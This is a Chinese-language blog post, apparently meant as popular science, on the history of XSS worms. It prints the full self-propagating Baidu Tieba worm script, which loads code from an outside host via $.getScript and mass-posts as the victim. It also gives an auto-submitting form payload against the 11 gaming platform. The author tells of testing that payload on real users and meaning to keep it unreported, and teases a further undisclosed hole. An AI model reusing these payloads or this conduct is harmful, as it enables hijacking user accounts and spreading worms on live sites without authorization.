日前，百度貼吧爆發(fā)了一次xss 蠕蟲(chóng)，這個(gè)蟲(chóng)子幾乎把整個(gè)貼吧都爬了一遍。xss worm到底是一個(gè)什么樣的技術(shù)？今天就乘著度娘爆發(fā)的小蟲(chóng)子，看看xss worm的前世今生。

一、世界上的第一條xss 蟲(chóng)子

在2005年10月初，第一只Web 2.0蠕蟲(chóng)I-Worm/JS.Sammy也是利用著名網(wǎng)絡(luò)社區(qū)MySpace.com的系統(tǒng)漏洞，以跨站腳本攻擊(XSS)的方式進(jìn)行傳播的Sammy 蠕蟲(chóng)的作者在社區(qū)個(gè)人資料中插入病毒腳本，當(dāng)其他MySpace.com用戶(hù)查看他的資料時(shí)，病毒腳本就會(huì)運(yùn)行，自動(dòng)把病毒作者加為好友，同時(shí)病毒本身也 會(huì)被復(fù)制到瀏覽者的個(gè)人資料里面。不到20個(gè)小時(shí)，就有超過(guò)100萬(wàn)MySpace.com用戶(hù)受到感染，造成網(wǎng)站一度癱瘓。MySpace.com為此 不得不禁止所有用戶(hù)在個(gè)人資料中加入任何腳本程序。

——from《web2.0網(wǎng)站安全思考》

這是世界上的第一條xss蟲(chóng)子，不像以前的蠕蟲(chóng)，只要是在MySpace.com這個(gè)域網(wǎng)絡(luò)社區(qū)為平臺(tái)，無(wú)論前端用戶(hù)的計(jì)算機(jī)是什么系統(tǒng)，只要瀏覽器執(zhí)行，那用戶(hù)即可能被感染，

其后國(guó)內(nèi)也爆發(fā)過(guò)一陣，飯否、百度空間、渣浪，都有過(guò)被蟲(chóng)子蠕動(dòng)的經(jīng)歷，其實(shí)可以看的出來(lái)，這些站點(diǎn)都有一個(gè)相同點(diǎn)，他們的交互性很強(qiáng)，一個(gè)用戶(hù)參與度高的站導(dǎo)致了用戶(hù)對(duì)頁(yè)面的操作權(quán)限很高，蟲(chóng)子也就通過(guò)這一點(diǎn)爆發(fā)。它滿(mǎn)足病毒的性質(zhì)，在web上通過(guò)HTTP請(qǐng)求各種傳播，利用客戶(hù)端執(zhí)行一些惡意javascript腳本。

[1]對(duì)使用者的數(shù)據(jù)具有操作權(quán)限

[2]也可以對(duì)網(wǎng)站造成阻止服務(wù)攻擊(我不習(xí)慣說(shuō)拒絕服務(wù)攻擊，因?yàn)閐eny應(yīng)該翻譯為組織，拒絕是雙方行為，而攻擊發(fā)生并不是受害方主動(dòng)拒絕，而是對(duì)其服務(wù)進(jìn)行阻止，對(duì)這個(gè)名稱(chēng)不服的請(qǐng)來(lái)辯!)

[3]邪惡的傳播網(wǎng)馬，比如通過(guò)ActiveX控件進(jìn)行本地攻擊(這個(gè)控件我就不太想吐槽了，之前在我空間里發(fā)過(guò)一個(gè)利用該控件進(jìn)行本地溢出的。。。不多說(shuō)，蛋疼)，因?yàn)閣orm的傳播速度本來(lái)就快的飛起，網(wǎng)馬結(jié)合后造成的攻擊力，我想應(yīng)該是成噸的傷害。

二、度娘的worm

var forumName = [];  
var forumId = [];  
for (var i = 0, j = 0; i <PageData.user.user_forum_list.info.length; i++) { if (PageData.user.user_forum_list.info[i].user_level > 3) {  
if (PageData.user.user_forum_list.info[i].forum_name!=”璐村惂鐩戞帶”) {  
forumName[j] = PageData.user.user_forum_list.info[i].forum_name;  
forumId[j] = PageData.user.user_forum_list.info[i].id;  
 
j++;  
}  
}  
}  
function madeit(myKw, myFid) {  
var c = rich_postor._getData();  
c.content=”\\u8bf7\\u5141\\u8bb8\\u6211\\u505a\\u4e00\\u4e2a\\u5fe7\\u4f24\\u7684\\u8868\\u60c5\\uff0c\\u662f\\u5fe7\\u4f24\\u54e6\\uff01″;  
cc.ftid = c.fid;  
c.ptid = “2337372175″;  
c.title = ‘\\u70b9\\u8fdb\\u6765\\u6709..”,a:$.getScript(\\’//xss.retaker.me/1.js\\’),a:”‘;  
c.fid = myFid;  
c.kw = myKw;  
$.post(“/relay/commit”, c);  
}  
//now begin!  
for (j = 0; j < forumName.length; j++) {  
setTimeout(“madeit(‘” + forumName[j] + “‘,’” + forumId[j] + “‘)”, 1500 * j);  
 
}  

這就是造成那個(gè)蟲(chóng)子的腳本，度娘響應(yīng)還是快的，刪貼神馬的，不過(guò)最終停止是這個(gè)第三方j(luò)s失效，截圖如下：

可以看到，影響蠻大的，這個(gè)蟲(chóng)子的行為是：一個(gè)用戶(hù)中招后，就會(huì)在所有該用戶(hù)收藏的貼吧中發(fā)帖，其傳播速度可想而知了

第三方j(luò)s的地址為：http://xss.retaker.me/1.js(現(xiàn)已失效)

在爆發(fā)時(shí)有個(gè)臨時(shí)解決方案，即：在C:\Windows\System32\drivers\etc\hosts用記事本打開(kāi)，添加127.0.0.1 xss.retaker.me

其實(shí)更覺(jué)得這位小哥像是在測(cè)試，然后就一不小心爆發(fā)了...(好吧，我還是太善良了)

除了本次事件外，在08年的度娘也爆發(fā)過(guò)一次

三、11平臺(tái)的蟲(chóng)子

其實(shí)也不算是真正的xss worm，只是傳播類(lèi)似，好像是去年我才開(kāi)學(xué)吧，我當(dāng)時(shí)才學(xué)習(xí)前端安全不久(一直玩滲透，前端安全也是當(dāng)工具用～)新浪微博好像是就挖出一個(gè)潛在的蟲(chóng)子，是個(gè)持久性的xss，在個(gè)人設(shè)置中個(gè)人資料填寫(xiě)存在持久性xss，當(dāng)鼠標(biāo)停留在用戶(hù)id時(shí)，即觸發(fā)xss攻擊

寫(xiě)一個(gè)post請(qǐng)求

<form accept-charset="utf-8" onsubmit="document.charset='utf-8';document.getElementById('intro').value = decodeURIComponent(document.getElementById('intro').value);" name="form" method="post" action="http://i.5211game.com/request/" target="_self" >
 <input name="method" type="text" value="publish">
 <input name="tag" type="text" value="">
 <input name="pic" type="text" value="">
 <input name="content" value="么么噠～@測(cè)試id">
 <input name="tx" type="text" value="0">
 <input name="sina" type="text" value="0">
 <input name="lastId" type="text" value="2522856">
 <input name="oldId" type="text" value="2514419">
        <input name="lasttime" type="text" value="1343530565579">
        <input name="tp" type="text" value="phrase">
 <input name="submit" type="image" src="http://xxxxxxxxxx" value="11111" onclick="submit()"/>
</form>
<script type="text/javascript">
document.form.submit();
</script>

行為如下：

自動(dòng)提交post，只要有其他用戶(hù)在11社區(qū)鼠標(biāo)停留到該測(cè)試id，即觸發(fā)

比較操蛋的是當(dāng)時(shí)小規(guī)模測(cè)試成了，然后本來(lái)想留著多玩兩天的，被wooyun的一個(gè)同學(xué)提交了，我擦。。。

四、 小福利，應(yīng)該是沒(méi)公開(kāi)的小漏洞奉上

這個(gè)洞也是我找的，也是11平臺(tái)(哈哈，我喜歡打dota)，不過(guò)這個(gè)洞的位置在發(fā)布私信處，指哪兒打哪兒啊

好吧，差不多寫(xiě)了這些。。。講的不好，我也就自己娛樂(lè)娛樂(lè)，重在科普